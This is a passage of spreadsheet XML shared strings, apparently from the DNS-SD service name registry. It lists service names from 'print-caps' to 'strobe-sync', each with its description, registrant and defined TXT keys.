    <t>[XMPP_Registrar]</t>
  </si>
  <si>
    <t>Defined TXT keys: See http://www.xmpp.org/registrar/linklocal.html
Note: Registration updated May 2007. Was formerly listed as "iChat AV" 
(Apple's IM client for Mac OS X) with TXT keys: txtvers, port.p2pj, phsh, vc,
1st, AIM, msg, status, last When first shipped in Mac OS X 10.2, iChat's
peer-to-peer messaging protocol was created to solve the problem of serverless
messaging between peers on the same link.  However, there is nothing inherent 
in the protocol that limits it to being only link-local; it was simply 
an artifact of iChat in Mac OS X 10.2 using link-local Multicast DNS to
discover peers. With the advent of Wide-Area DNS-SD, it is also possible 
to use iChat's peer-to-peer messaging between machines on different links.</t>
  </si>
  <si>
    <t>print-caps</t>
  </si>
  <si>
    <t>Retrieve a description of a device's print capabilities</t>
  </si>
  <si>
    <t>[Troy_Bergstrand]</t>
  </si>
  <si>
    <t>Printopia Server</t>
  </si>
  <si>
    <t>Defined TXT keys: uuid, vers, pvers</t>
  </si>
  <si>
    <t>Profile for Mac medical practice management software</t>
  </si>
  <si>
    <t>[David_Sinclair_2]</t>
  </si>
  <si>
    <t>prolog</t>
  </si>
  <si>
    <t>Prolog</t>
  </si>
  <si>
    <t>[Mike_Brady]</t>
  </si>
  <si>
    <t>Defined TXT keys: version=&lt;version number&gt;</t>
  </si>
  <si>
    <t>protonet</t>
  </si>
  <si>
    <t>Protonet node and service discovery protocol</t>
  </si>
  <si>
    <t>[Ali_Jelveh]</t>
  </si>
  <si>
    <t>Defined TXT keys: version, notes</t>
  </si>
  <si>
    <t>psap</t>
  </si>
  <si>
    <t>Progal Service Advertising Protocol</t>
  </si>
  <si>
    <t>[Soren_Weber]</t>
  </si>
  <si>
    <t>Defined TXT keys: c0, c1, ..., cn</t>
  </si>
  <si>
    <t>psia</t>
  </si>
  <si>
    <t>Physical Security Interoperability Alliance Protocol</t>
  </si>
  <si>
    <t>[Frank_Yeh]</t>
  </si>
  <si>
    <t>pstmailsync</t>
  </si>
  <si>
    <t>File synchronization protocol for Pst Mail Sync</t>
  </si>
  <si>
    <t>[Arrow_Bit_SL]</t>
  </si>
  <si>
    <t>[Javier_Nigro]</t>
  </si>
  <si>
    <t>Defined TXT keys: uuid=&lt;unique instance identifier&gt;</t>
  </si>
  <si>
    <t>pstmailsync-ssl</t>
  </si>
  <si>
    <t>Secured file synchronization protocol for Pst Mail Sync</t>
  </si>
  <si>
    <t>ptnetprosrv2</t>
  </si>
  <si>
    <t>PTNetPro Service</t>
  </si>
  <si>
    <t>[Apple_Computer]</t>
  </si>
  <si>
    <t>Defined TXT keys: None
Profiling and performance analysis protocol for Shark 4.0 and BigTop.</t>
  </si>
  <si>
    <t>ptp-init</t>
  </si>
  <si>
    <t>Picture Transfer Protocol(PTP) Initiator</t>
  </si>
  <si>
    <t>[Tatsuhiko_Sakai]</t>
  </si>
  <si>
    <t>Defined TXT keys: srvver, mn, mf, md, srv, tid</t>
  </si>
  <si>
    <t>ptp-req</t>
  </si>
  <si>
    <t>PTP Initiation Request Protocol</t>
  </si>
  <si>
    <t>[Mark_Wood]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, guid, c0, c1, c2, ..., where the number of c_n attributes is variable</t>
  </si>
  <si>
    <t>puzzle</t>
  </si>
  <si>
    <t>Protocol used for puzzle games</t>
  </si>
  <si>
    <t>[Michael_Thomason]</t>
  </si>
  <si>
    <t>qbox</t>
  </si>
  <si>
    <t>QBox Appliance Locator</t>
  </si>
  <si>
    <t>[Geoff_Back_4]</t>
  </si>
  <si>
    <t>qttp</t>
  </si>
  <si>
    <t>QuickTime Transfer Protocol</t>
  </si>
  <si>
    <t>Defined TXT keys: u=&lt;username&gt; p=&lt;password&gt; path=&lt;path to document&gt; (Same as for _http._tcp)</t>
  </si>
  <si>
    <t>quad</t>
  </si>
  <si>
    <t>Distributed Game Data</t>
  </si>
  <si>
    <t>[Niall_Hogg]</t>
  </si>
  <si>
    <t>quinn</t>
  </si>
  <si>
    <t>Quinn Game Server</t>
  </si>
  <si>
    <t>[Simon_Haertel]</t>
  </si>
  <si>
    <t>qwizcollab</t>
  </si>
  <si>
    <t>Broadcast of Qwizdom Presentation sessions for joining by a 
      client, such as Qwizdom Notes+.</t>
  </si>
  <si>
    <t>[Qwizdom_Inc.]</t>
  </si>
  <si>
    <t>[Matthew_Owings]</t>
  </si>
  <si>
    <t>rakket</t>
  </si>
  <si>
    <t>Rakket Client Protocol</t>
  </si>
  <si>
    <t>[Orion_Reblitz_Richar]</t>
  </si>
  <si>
    <t>radiotag</t>
  </si>
  <si>
    <t>RadioTAG: Event tagging for radio services</t>
  </si>
  <si>
    <t>[Andy_Buckingham]</t>
  </si>
  <si>
    <t>radiovis</t>
  </si>
  <si>
    <t>RadioVIS: Visualisation for radio services</t>
  </si>
  <si>
    <t>radioepg</t>
  </si>
  <si>
    <t>RadioEPG: Electronic Programme Guide for radio services</t>
  </si>
  <si>
    <t>radioport</t>
  </si>
  <si>
    <t>RadioPort Message Service</t>
  </si>
  <si>
    <t>[Bob_Iannucci]</t>
  </si>
  <si>
    <t>Defined TXT keys: NONE</t>
  </si>
  <si>
    <t>radiusdtls</t>
  </si>
  <si>
    <t>Authentication, Accounting, and Dynamic Authorization via the RADIUS protocol. This service name is used to construct the SRV service label "_radiusdtls" for discovery of RADIUS/DTLS servers.</t>
  </si>
  <si>
    <t>[RFC7585]</t>
  </si>
  <si>
    <t>radiustls</t>
  </si>
  <si>
    <t>Authentication, Accounting, and Dynamic Authorization via the RADIUS protocol. This service name is used to construct the SRV service label "_radiustls" for discovery of RADIUS/TLS servers.</t>
  </si>
  <si>
    <t>railduino</t>
  </si>
  <si>
    <t>Model Railroad Messaging</t>
  </si>
  <si>
    <t>[Railduino]</t>
  </si>
  <si>
    <t>[Volker_Wiegand_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: role=master</t>
  </si>
  <si>
    <t>raop</t>
  </si>
  <si>
    <t>Remote Audio Output Protocol (AirTunes)</t>
  </si>
  <si>
    <t>[BonjourDev]</t>
  </si>
  <si>
    <t>rbr</t>
  </si>
  <si>
    <t>RBR Instrument Communication</t>
  </si>
  <si>
    <t>[Greg_Johnson]</t>
  </si>
  <si>
    <t>rce</t>
  </si>
  <si>
    <t>PowerCard</t>
  </si>
  <si>
    <t>[DeVoeSquared]</t>
  </si>
  <si>
    <t>Windows Remote Desktop Protocol</t>
  </si>
  <si>
    <t>[Jugaari]</t>
  </si>
  <si>
    <t>realplayfavs</t>
  </si>
  <si>
    <t>RealPlayer Shared Favorites</t>
  </si>
  <si>
    <t>[RealNetworks]</t>
  </si>
  <si>
    <t>recipe-box</t>
  </si>
  <si>
    <t>The Recipe Box Exchange</t>
  </si>
  <si>
    <t>[Corpus_Collusion]</t>
  </si>
  <si>
    <t>[Kathy_Tafel]</t>
  </si>
  <si>
    <t>recipe-sharing</t>
  </si>
  <si>
    <t>Recipe Sharing Protocol</t>
  </si>
  <si>
    <t>[Daniel_G_Taylor]</t>
  </si>
  <si>
    <t>2007-11</t>
  </si>
  <si>
    <t>Defined TXT keys: [http://www.recipemanager.org/rsp/rsp10draft.html#dnssd]</t>
  </si>
  <si>
    <t>recolive-cc</t>
  </si>
  <si>
    <t>Remote Camera Control</t>
  </si>
  <si>
    <t>[RecoLive_SÃ rl]</t>
  </si>
  <si>
    <t>[Gabriele_Mondada]</t>
  </si>
  <si>
    <t>Defined TXT keys:  txtvers, cid, nbd, cap</t>
  </si>
  <si>
    <t>recordit-itp</t>
  </si>
  <si>
    <t>Recordit Image Transport Protocol</t>
  </si>
  <si>
    <t>[Freshout]</t>
  </si>
  <si>
    <t>[Ruben_Beltran_del_Rio_2]</t>
  </si>
  <si>
    <t>remote</t>
  </si>
  <si>
    <t>Remote Device Control Protocol</t>
  </si>
  <si>
    <t>[Gregory_Dudek]</t>
  </si>
  <si>
    <t>Defined TXT keys:   txtvers=&lt;TXT record version tag&gt;
  protovers=&lt;protocol vesion number&gt;
  forground=&lt;primary device or system&gt;
  version=&lt;firmware/instrument controller version&gt;</t>
  </si>
  <si>
    <t>remotebuddy</t>
  </si>
  <si>
    <t>Remote Buddy remote control software command and data exchange</t>
  </si>
  <si>
    <t>[IOSPIRIT_GmbH]</t>
  </si>
  <si>
    <t>[Felix_Schwarz]</t>
  </si>
  <si>
    <t>remoteburn</t>
  </si>
  <si>
    <t>LaCie Remote Burn</t>
  </si>
  <si>
    <t>[Serge_DE_LUCA]</t>
  </si>
  <si>
    <t>Defined TXT keys: server_version, min_client_version</t>
  </si>
  <si>
    <t>renderpipe</t>
  </si>
  <si>
    <t>ARTvps RenderDrive/PURE Renderer Protocol</t>
  </si>
  <si>
    <t>[Andrew_Hoddinott]</t>
  </si>
  <si>
    <t>rendezvouspong</t>
  </si>
  <si>
    <t>RendezvousPong</t>
  </si>
  <si>
    <t>renkara-sync</t>
  </si>
  <si>
    <t>Renkara synchronization protocol</t>
  </si>
  <si>
    <t>[Michael_J_Primeaux]</t>
  </si>
  <si>
    <t>resol-vbus</t>
  </si>
  <si>
    <t>RESOL VBus</t>
  </si>
  <si>
    <t>[Daniel_Wippermann]</t>
  </si>
  <si>
    <t>[Michael_Marks]</t>
  </si>
  <si>
    <t>rfbc</t>
  </si>
  <si>
    <t>Remote Frame Buffer Client (Used by VNC viewers in listen-mode)</t>
  </si>
  <si>
    <t>[Ole_Morten_Duesund]</t>
  </si>
  <si>
    <t>Defined TXT keys: server=dns-name/ip-address:port of currently displayed VNC server.
  Empty if not showing anything/available.</t>
  </si>
  <si>
    <t>rfid</t>
  </si>
  <si>
    <t>RFID Reader Mach1(tm) Protocol</t>
  </si>
  <si>
    <t>[Paul_Dietrich]</t>
  </si>
  <si>
    <t>rgb</t>
  </si>
  <si>
    <t>RGB Spectrum Device Discovery</t>
  </si>
  <si>
    <t>[RGB_Spectrum]</t>
  </si>
  <si>
    <t>[Steve_Hershey]</t>
  </si>
  <si>
    <t>Defined TXT keys: Keyboard, Mouse, Option1, Option2, Option3, Option4, ModelName</t>
  </si>
  <si>
    <t>riousbprint</t>
  </si>
  <si>
    <t>Remote I/O USB Printer Protocol</t>
  </si>
  <si>
    <t>[Rob_Newberry]</t>
  </si>
  <si>
    <t>roambot</t>
  </si>
  <si>
    <t>Roambot communication</t>
  </si>
  <si>
    <t>[Roambotics_Inc]</t>
  </si>
  <si>
    <t>[Scott_Menor]</t>
  </si>
  <si>
    <t>robustirc</t>
  </si>
  <si>
    <t>Like ircu (RFC1459), but failure tolerant due to strong consistency among n&gt;=3 servers</t>
  </si>
  <si>
    <t>[Michael_Stapelberg]</t>
  </si>
  <si>
    <t>roku-rcp</t>
  </si>
  <si>
    <t>Roku Control Protocol</t>
  </si>
  <si>
    <t>[Don_Woodward]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1</t>
  </si>
  <si>
    <t>roomcast-capi</t>
  </si>
  <si>
    <t>RoomCast Control Protocol</t>
  </si>
  <si>
    <t>[Colin_Corby]</t>
  </si>
  <si>
    <t>Defined TXT keys: protocolVersion, uuid</t>
  </si>
  <si>
    <t>roomcast-mapi</t>
  </si>
  <si>
    <t>RoomCast Management Protocol</t>
  </si>
  <si>
    <t>rql</t>
  </si>
  <si>
    <t>RemoteQuickLaunch</t>
  </si>
  <si>
    <t>[Daniel_Heffernan]</t>
  </si>
  <si>
    <t>rr-disc</t>
  </si>
  <si>
    <t>Robot Raconteur discovery</t>
  </si>
  <si>
    <t>rradict</t>
  </si>
  <si>
    <t>Ruckus Radio Access Device, Installation, Commissioning and Troubleshooting service.</t>
  </si>
  <si>
    <t>[Dave_Stephenson]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=&lt;version&gt;, serial=&lt;serial number&gt;, 
        mac=&lt;mac-address&gt;, model=&lt;model number&gt;, opMode=&lt;operational mode&gt;, 
          tx=&lt;transmitter-status&gt;, timing=&lt;timing-status&gt;</t>
  </si>
  <si>
    <t>rsmp-server</t>
  </si>
  <si>
    <t>Remote System Management Protocol (Server Instance)</t>
  </si>
  <si>
    <t>Defined TXT keys: apiver=&lt;major.minor&gt;</t>
  </si>
  <si>
    <t>rubygems</t>
  </si>
  <si>
    <t>RubyGems GemServer</t>
  </si>
  <si>
    <t>[Rich_Kilmer]</t>
  </si>
  <si>
    <t>rxxmiele</t>
  </si>
  <si>
    <t>Miele protocol robot cleaners</t>
  </si>
  <si>
    <t>rym-rrc</t>
  </si>
  <si>
    <t>Raymarine remote control protocol</t>
  </si>
  <si>
    <t>[Raymarine_UK_Limited]</t>
  </si>
  <si>
    <t>[Geoffrey_Beer]</t>
  </si>
  <si>
    <t>Defined TXT keys: raymarine-mfd-rrc-version, raymarine-mfd-model, raymarine-mfd-serial</t>
  </si>
  <si>
    <t>safarimenu</t>
  </si>
  <si>
    <t>Safari Menu</t>
  </si>
  <si>
    <t>[Jesus_De_Meyer]</t>
  </si>
  <si>
    <t>sallingbridge</t>
  </si>
  <si>
    <t>Salling Clicker Sharing</t>
  </si>
  <si>
    <t>[Jonas_Salling]</t>
  </si>
  <si>
    <t>sallingclicker</t>
  </si>
  <si>
    <t>Salling Clicker Service</t>
  </si>
  <si>
    <t>salutafugijms</t>
  </si>
  <si>
    <t>Salutafugi Peer-To-Peer Java Message Service Implementation</t>
  </si>
  <si>
    <t>[David_Walend]</t>
  </si>
  <si>
    <t>Defined TXT keys: SalutaProperties</t>
  </si>
  <si>
    <t>sandvox</t>
  </si>
  <si>
    <t>Sandvox</t>
  </si>
  <si>
    <t>[Karelia_Software]</t>
  </si>
  <si>
    <t>savagesoft</t>
  </si>
  <si>
    <t>Proprietary Client Server Protocol</t>
  </si>
  <si>
    <t>[Andy_Savage]</t>
  </si>
  <si>
    <t>sc-golf</t>
  </si>
  <si>
    <t>StrawberryCat Golf Protocol</t>
  </si>
  <si>
    <t>[Phil_Willoughby]</t>
  </si>
  <si>
    <t>scanner</t>
  </si>
  <si>
    <t>Bonjour Scanning</t>
  </si>
  <si>
    <t>schdca</t>
  </si>
  <si>
    <t>schindler internal messaging service</t>
  </si>
  <si>
    <t>[Schindler_Aufzuege_ag]</t>
  </si>
  <si>
    <t>[Arno_Odermatt]</t>
  </si>
  <si>
    <t>schick</t>
  </si>
  <si>
    <t>Schick</t>
  </si>
  <si>
    <t>[Heiko_Kretschmer]</t>
  </si>
  <si>
    <t>schims</t>
  </si>
  <si>
    <t>schlog</t>
  </si>
  <si>
    <t>logging service</t>
  </si>
  <si>
    <t>schmpp</t>
  </si>
  <si>
    <t>Schindler maintenance portal protocol</t>
  </si>
  <si>
    <t>schoms</t>
  </si>
  <si>
    <t>schindler object messaging system</t>
  </si>
  <si>
    <t>schsap</t>
  </si>
  <si>
    <t>Schindler service authentication portal</t>
  </si>
  <si>
    <t>schsrmp</t>
  </si>
  <si>
    <t>Schindler internal messaging service</t>
  </si>
  <si>
    <t>schvpp</t>
  </si>
  <si>
    <t>scone</t>
  </si>
  <si>
    <t>Scone</t>
  </si>
  <si>
    <t>[James_Moore]</t>
  </si>
  <si>
    <t>scoop-sftp</t>
  </si>
  <si>
    <t>The service name is used by the SFTP protocol to 
      upload log files from vehicles to road side units in a securely 
      way in a cooperative intelligent transportation system.</t>
  </si>
  <si>
    <t>[SCOOP_at_F_Project]</t>
  </si>
  <si>
    <t>[Houda_Labiod]</t>
  </si>
  <si>
    <t>IEEE 488.2 (SCPI) Socket</t>
  </si>
  <si>
    <t>[Nick_Barendt_3]</t>
  </si>
  <si>
    <t>IEEE 488.2 (SCPI) Telnet</t>
  </si>
  <si>
    <t>sdsharing</t>
  </si>
  <si>
    <t>Speed Download</t>
  </si>
  <si>
    <t>[Yazsoft]</t>
  </si>
  <si>
    <t>see</t>
  </si>
  <si>
    <t>SubEthaEdit 2</t>
  </si>
  <si>
    <t>[TheCodingMonkeys]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1, name=&lt;Full Name&gt;, userid=&lt;User ID&gt;, version=2</t>
  </si>
  <si>
    <t>seeCard</t>
  </si>
  <si>
    <t>[Stefan_Pantke]</t>
  </si>
  <si>
    <t>senteo-http</t>
  </si>
  <si>
    <t>Senteo Assessment Software Protocol</t>
  </si>
  <si>
    <t>[Michael_Boyle]</t>
  </si>
  <si>
    <t>sentillion-vlc</t>
  </si>
  <si>
    <t>Sentillion Vault System</t>
  </si>
  <si>
    <t>[George_Hartz]</t>
  </si>
  <si>
    <t>sentillion-vlt</t>
  </si>
  <si>
    <t>Sentillion Vault Systems Cluster</t>
  </si>
  <si>
    <t>sepvsync</t>
  </si>
  <si>
    <t>SEPV Application Data Synchronization Protocol</t>
  </si>
  <si>
    <t>[Kazuya_Ogata]</t>
  </si>
  <si>
    <t>serendipd</t>
  </si>
  <si>
    <t>serendiPd Shared Patches for Pure Data</t>
  </si>
  <si>
    <t>[Hans_Christoph_Stein]</t>
  </si>
  <si>
    <t>servereye</t>
  </si>
  <si>
    <t>ServerEye AgentContainer Communication Protocol</t>
  </si>
  <si>
    <t>[Andreas_Behr]</t>
  </si>
  <si>
    <t>servermgr</t>
  </si>
  <si>
    <t>Mac OS X Server Admin</t>
  </si>
  <si>
    <t>[Jeff_Albouze]</t>
  </si>
  <si>
    <t>services</t>
  </si>
  <si>
    <t>sessionfs</t>
  </si>
  <si>
    <t>Session File Sharing</t>
  </si>
  <si>
    <t>[Anthony_Williams]</t>
  </si>
  <si>
    <t>Defined TXT keys: Text keys are the file extensions of any file the user plans to share, i.e. pdf, doc, mp3.</t>
  </si>
  <si>
    <t>setlistmaker-rc</t>
  </si>
  <si>
    <t>Remote Control for Set List Maker app</t>
  </si>
  <si>
    <t>setlistmaker-ss</t>
  </si>
  <si>
    <t>Screen sharing for Set List Maker app</t>
  </si>
  <si>
    <t>sftp-ssh</t>
  </si>
  <si>
    <t>Secure File Transfer Protocol over SSH</t>
  </si>
  <si>
    <t>[Bryan_Cole]</t>
  </si>
  <si>
    <t>sge-exec</t>
  </si>
  <si>
    <t>Sun Grid Engine (Execution Host)</t>
  </si>
  <si>
    <t>[Bill_Van_Etten]</t>
  </si>
  <si>
    <t>Sun Grid Engine (Master)</t>
  </si>
  <si>
    <t>shifter</t>
  </si>
  <si>
    <t>Window Shifter server protocol</t>
  </si>
  <si>
    <t>Defined TXT keys:   username     The login username to use (optional)
  ssh_tunnel   Whether an SSH tunnel must be used (required)
  iface        The network interface the server is on (required - may be empty)
  version      Software version (required)
  ID           Server Identifier (requried)</t>
  </si>
  <si>
    <t>ship</t>
  </si>
  <si>
    <t>SHIP (Smart Home IP)</t>
  </si>
  <si>
    <t>[EEBus_Initiative]</t>
  </si>
  <si>
    <t>[Andreas_Westermann]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=&lt;txtVersionNumber&gt; id=&lt;uniqueDeviceIdentifier&gt; path=&lt;wssPath&gt; seesport=&lt;portForSmartEndToEndSecurityIfSupported&gt; register=&lt;registerFlag&gt;</t>
  </si>
  <si>
    <t>shipsgm</t>
  </si>
  <si>
    <t>Swift Office Ships</t>
  </si>
  <si>
    <t>[Verek]</t>
  </si>
  <si>
    <t>shipsinvit</t>
  </si>
  <si>
    <t>shoppersync</t>
  </si>
  <si>
    <t>SplashShopper Synchronization Service</t>
  </si>
  <si>
    <t>shots-sync</t>
  </si>
  <si>
    <t>The protocol is used to sync database among iOS devices 
      and Mac OS X computers.</t>
  </si>
  <si>
    <t>[Ryota_Kurata]</t>
  </si>
  <si>
    <t>shoutcast</t>
  </si>
  <si>
    <t>Nicecast</t>
  </si>
  <si>
    <t>[Rogue_Amoeba_2]</t>
  </si>
  <si>
    <t>siminsufflator</t>
  </si>
  <si>
    <t>Simulated insufflator synchronisation protocol</t>
  </si>
  <si>
    <t>[Niels_Castle_2]</t>
  </si>
  <si>
    <t>simmon</t>
  </si>
  <si>
    <t>Medical simulation patient monitor syncronisation protocol</t>
  </si>
  <si>
    <t>[Niels_Castle]</t>
  </si>
  <si>
    <t>simusoftpong</t>
  </si>
  <si>
    <t>simusoftpong iPhone game protocol</t>
  </si>
  <si>
    <t>[Anders_Svensson]</t>
  </si>
  <si>
    <t>sipuri</t>
  </si>
  <si>
    <t>Session Initiation Protocol Uniform Resource Identifier</t>
  </si>
  <si>
    <t>[Jae_Woo_Lee]</t>
  </si>
  <si>
    <t>Defined TXT keys: Defined in URL specification</t>
  </si>
  <si>
    <t>sironaxray</t>
  </si>
  <si>
    <t>Sirona Xray Protocol</t>
  </si>
  <si>
    <t>[Michael_Dalpiaz]</t>
  </si>
  <si>
    <t>Defined TXT keys: Manufacturer=Sirona</t>
  </si>
  <si>
    <t>skillscapture</t>
  </si>
  <si>
    <t>The protocol is used to transfer database records between an iOS device to a Mac OS X computer</t>
  </si>
  <si>
    <t>[Legentis_Ltd]</t>
  </si>
  <si>
    <t>[David_Elliman]</t>
  </si>
  <si>
    <t>skype</t>
  </si>
  <si>
    <t>Skype</t>
  </si>
  <si>
    <t>Defined TXT keys: platform, status, auth, rversion, version</t>
  </si>
  <si>
    <t>sleep-proxy</t>
  </si>
  <si>
    <t>Sleep Proxy Server</t>
  </si>
  <si>
    <t>sleeptracker</t>
  </si>
  <si>
    <t>Sleeptracker(R) The loT Smartbed Platform</t>
  </si>
  <si>
    <t>[Fullpower_Technologies_Inc]</t>
  </si>
  <si>
    <t>[Corporate_Compliance_Officer]</t>
  </si>
  <si>
    <t>Defined TXT keys: serial=&lt;serial&gt; hostname=&lt;host&gt; osVer=&lt;ver&gt; appVer=&lt;ver&gt; unit=&lt;name&gt; environment=&lt;env&gt;</t>
  </si>
  <si>
    <t>slimcli</t>
  </si>
  <si>
    <t>SliMP3 Server Command-Line Interface</t>
  </si>
  <si>
    <t>[Dean_Blackketter_2]</t>
  </si>
  <si>
    <t>slimhttp</t>
  </si>
  <si>
    <t>SliMP3 Server Web Interface</t>
  </si>
  <si>
    <t>slpda</t>
  </si>
  <si>
    <t>Remote Service Discovery in the Service Location</t>
  </si>
  <si>
    <t>[RFC3832]</t>
  </si>
  <si>
    <t>smag</t>
  </si>
  <si>
    <t>terminal access to laundry appliances</t>
  </si>
  <si>
    <t>[Schulthess_Maschinen_AG]</t>
  </si>
  <si>
    <t>[Michael_Schwetz]</t>
  </si>
  <si>
    <t>Defined TXT keys: mName, tName, lName, Type, Timestamp</t>
  </si>
  <si>
    <t>smartenergy</t>
  </si>
  <si>
    <t>Smart Energy Profile</t>
  </si>
  <si>
    <t>[Robby_Simpson]</t>
  </si>
  <si>
    <t>Defined TXT keys: See http://www.zigbee.org/SmartEnergy</t>
  </si>
  <si>
    <t>smartsocket</t>
  </si>
  <si>
    <t>home control</t>
  </si>
  <si>
    <t>[Robert_Diamond]</t>
  </si>
  <si>
    <t>smb</t>
  </si>
  <si>
    <t>Server Message Block over TCP/IP</t>
  </si>
  <si>
    <t>smimeca</t>
  </si>
  <si>
    <t>Domain signing certificate for S/MIME keys</t>
  </si>
  <si>
    <t>sms</t>
  </si>
  <si>
    <t>Short Text Message Sending and Delivery Status Service</t>
  </si>
  <si>
    <t>[Christian_Flintrup]</t>
  </si>
  <si>
    <t>smsync</t>
  </si>
  <si>
    <t>Syncellence file synchronization protocol</t>
  </si>
  <si>
    <t>[Dialectro_Software]</t>
  </si>
  <si>
    <t>[Gord_Peters]</t>
  </si>
  <si>
    <t>Defined TXT keys: device=&lt;device type&gt;
      protocol=&lt;version number&gt;
      os=&lt;operating system name&gt;
      osver=&lt;operating system version&gt;</t>
  </si>
  <si>
    <t>soap</t>
  </si>
  <si>
    <t>Simple Object Access Protocol</t>
  </si>
  <si>
    <t>[Andrew_Donoho]</t>
  </si>
  <si>
    <t>socketcloud</t>
  </si>
  <si>
    <t>Socketcloud distributed application framework</t>
  </si>
  <si>
    <t>[Robert_Goodyear]</t>
  </si>
  <si>
    <t>Defined TXT keys: system, service, process, context, direction, status, progress, health, directive, flags</t>
  </si>
  <si>
    <t>soda</t>
  </si>
  <si>
    <t>Secure On Device API</t>
  </si>
  <si>
    <t>[Smith_Micro_Software_Inc]</t>
  </si>
  <si>
    <t>[David_Sperling_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: a. ssid=&lt;Wi-Fi SSID of the device&gt;
b. bssid=&lt;Wi-Fi BSSID of the device&gt;</t>
  </si>
  <si>
    <t>souschef</t>
  </si>
  <si>
    <t>SousChef Recipe Sharing Protocol</t>
  </si>
  <si>
    <t>[Ben]</t>
  </si>
  <si>
    <t>sox</t>
  </si>
  <si>
    <t>Simple Object eXchange</t>
  </si>
  <si>
    <t>[Igor_Mozolevsky]</t>
  </si>
  <si>
    <t>sparechange</t>
  </si>
  <si>
    <t>SpareChange data sharing protocol</t>
  </si>
  <si>
    <t>[Dave_Carrigan]</t>
  </si>
  <si>
    <t>sparql</t>
  </si>
  <si>
    <t>SPARQL Protocol and RDF Query Language</t>
  </si>
  <si>
    <t>[Alex_Tucker]</t>
  </si>
  <si>
    <t>Defined TXT keys:   txtvers=1
  path=&lt;relative or absolute URL of endpoint&gt;
  protovers=&lt;number&gt; [if not specified then default is 1.0, corresponding to SPARQL version]
  binding=&lt;HTTP | SOAP&gt; [if not specified then default is HTTP]
  vocabs=&lt;space separated list of URIs&gt; [RDF vocabularies or OWL ontologies used by the endpoint]
  metadata=&lt;URL&gt; [to fetch RDF/XML description of SPARQL service]</t>
  </si>
  <si>
    <t>spearcat</t>
  </si>
  <si>
    <t>sPearCat Host Discovery</t>
  </si>
  <si>
    <t>[Pierre_Frisch_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: applicationname=&lt;Application Name&gt;, osname=&lt;OS Name&gt;, sslsupport=&lt;Uses SSL&gt;</t>
  </si>
  <si>
    <t>spidap</t>
  </si>
  <si>
    <t>Sierra Photonics Inc. data protocol</t>
  </si>
  <si>
    <t>[Sierra_Photonics_Inc]</t>
  </si>
  <si>
    <t>[Support_Staff]</t>
  </si>
  <si>
    <t>spincrisis</t>
  </si>
  <si>
    <t>Spin Crisis</t>
  </si>
  <si>
    <t>[Sphera_Software]</t>
  </si>
  <si>
    <t>spiderelectron</t>
  </si>
  <si>
    <t>Binary message passing protocol</t>
  </si>
  <si>
    <t>[Spider_Electron]</t>
  </si>
  <si>
    <t>Defined TXT keys: VER, STATUS</t>
  </si>
  <si>
    <t>spl-itunes</t>
  </si>
  <si>
    <t>launchTunes</t>
  </si>
  <si>
    <t>[David_Nanian_2]</t>
  </si>
  <si>
    <t>spr-itunes</t>
  </si>
  <si>
    <t>netTunes</t>
  </si>
  <si>
    <t>splashsync</t>
  </si>
  <si>
    <t>SplashData Synchronization Service</t>
  </si>
  <si>
    <t>spres</t>
  </si>
  <si>
    <t>SongPresenter</t>
  </si>
  <si>
    <t>[Tobias_Hoffmann]</t>
  </si>
  <si>
    <t>Defined TXT keys: version, name</t>
  </si>
  <si>
    <t>spx-hmp</t>
  </si>
  <si>
    <t>SpinetiX HMP</t>
  </si>
  <si>
    <t>[SpinetiX_S_A]</t>
  </si>
  <si>
    <t>[Diego_Santa_Cruz]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1
cport= the port for the content HTTP server
      (secondary HTTP server used for content publishing)
      mode= the mode in which the HMP device is currently
      operating, one of "normal", "safe" or "recovery"
      serial= serial number of the HMP device
      firmware= firmware version string (e.g.,
      2.1.0-0.1.7844)
      model= model string (e.g., HMP100)</t>
  </si>
  <si>
    <t>sqp</t>
  </si>
  <si>
    <t>Square Connect Control Protocol</t>
  </si>
  <si>
    <t>[Square_Connect_Inc]</t>
  </si>
  <si>
    <t>[Mat_Henshall]</t>
  </si>
  <si>
    <t>ss-sign</t>
  </si>
  <si>
    <t>Samsung Smart Interaction for Group Network</t>
  </si>
  <si>
    <t>[Samsung]</t>
  </si>
  <si>
    <t>[Lee_HoJun]</t>
  </si>
  <si>
    <t>ss-sign-disc</t>
  </si>
  <si>
    <t>Samsung Smart Interaction for Group Network Discovery</t>
  </si>
  <si>
    <t>ssd-audio</t>
  </si>
  <si>
    <t>Studio Six Digital Wireless Audio</t>
  </si>
  <si>
    <t>[Studio_Six_Digital_LLC]</t>
  </si>
  <si>
    <t>[Andrew_Smith]</t>
  </si>
  <si>
    <t>SSH Remote Login Protocol</t>
  </si>
  <si>
    <t>[Tatu_Ylonen]</t>
  </si>
  <si>
    <t>Defined TXT keys:  u=&lt;username&gt; p=&lt;password&gt;</t>
  </si>
  <si>
    <t>ssscreenshare</t>
  </si>
  <si>
    <t>Screen Sharing</t>
  </si>
  <si>
    <t>startrecapp</t>
  </si>
  <si>
    <t>Remote Controlled Multimedia Recorder Network</t>
  </si>
  <si>
    <t>[Luca_Cipressi]</t>
  </si>
  <si>
    <t>stingray-rpc</t>
  </si>
  <si>
    <t>Stingray Remote Procedure Call</t>
  </si>
  <si>
    <t>[IK_SATPROF_LLC]</t>
  </si>
  <si>
    <t>[Sergey_Zubov_2]</t>
  </si>
  <si>
    <t>stingray-remote</t>
  </si>
  <si>
    <t>Stingray remote control</t>
  </si>
  <si>
    <t>strateges</t>
  </si>
  <si>
    <t>Strateges</t>
  </si>
  <si>
    <t>[Jean_Olivier_Lanctot]</t>
  </si>
  <si>
    <t>stanza</t>
  </si>
  <si>
    <t>Lexcycle Stanza service for discovering shared books</t>
  </si>
  <si>
    <t>[Marc_Prud_hommeaux]</t>
  </si>
  <si>
    <t>stickynotes</t>
  </si>
  <si>
    <t>Sticky Notes</t>
  </si>
  <si>
    <t>[Johnnie_Walker]</t>
  </si>
  <si>
    <t>stotp</t>
  </si>
  <si>
    <t>One Time Pad Synchronisation</t>
  </si>
  <si>
    <t>[softthere_com]</t>
  </si>
  <si>
    <t>[James_Crosby]</t>
  </si>
  <si>
    <t>strobe-sync</t>
  </si>
  <si>
    <t>Strobe Synchronization</t>
